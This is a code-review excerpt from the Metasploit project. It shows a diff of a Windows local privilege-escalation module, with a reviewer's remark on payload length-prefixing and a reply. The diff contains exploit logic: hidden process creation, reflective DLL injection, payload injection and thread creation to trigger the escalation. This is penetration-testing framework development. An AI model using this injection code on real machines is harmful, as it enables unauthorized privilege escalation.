modules/exploits/windows/local/tokenmagic.rb

```diff
@@ -73,42 +79,16 @@ def initialize(info = {})
     ])
   end
 
-  def setup_process
-    begin
-      print_status('Launching notepad to host the exploit...')
-      notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
-      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
-      print_good("Process #{process.pid} launched.")
-    rescue Rex::Post::Meterpreter::RequestError
-      # Sandboxes could not allow to create a new process
-      # stdapi_sys_process_execute: Operation failed: Access is denied.
-      print_error('Operation failed. Trying to elevate the current process...')
-      process = client.sys.process.open
-    end
-    process
-  end
-
-  def inject_magic(process)
+  def launch_dll_trigger
     if sysinfo['Architecture'] == ARCH_X64
       library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x64.dll')
     elsif sysinfo['Architecture'] == ARCH_X86
       library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x86.dll')
     end
 
-    library_path = ::File.expand_path(library_path)
-    print_status("Reflectively injecting the trigger DLL into #{process.pid}...")
-    dll = ::File.read(library_path)
-    exploit_mem, offset = inject_dll_data_into_process(process, dll)
-    print_good('Trigger injected.')
-    payload_mem = inject_into_process(process, payload.encoded)
-    print_good('Payload injected. Starting thread...')
-    process.thread.create(exploit_mem + offset, payload_mem)
-  end
-
-  def launch_dll_trigger
-    print_status('Trying to start notepad')
-    process = setup_process
-    inject_magic(process)
+    print_status('Reflectively injecting exploit DLL into a spare process and triggering the LPE...')
+    encoded_payload = payload.encoded
+    execute_dll(library_path, [encoded_payload.length].pack('I<') + encoded_payload)
```

Comment:
This does not look like the payload is expecting the length to be prefixed to it.

Reply:
Resolved with https://github.com/rapid7/metasploit-framework/pull/15384/commits/4ab1b6ca11cc7b025da6094ec4552eaaa8ad657b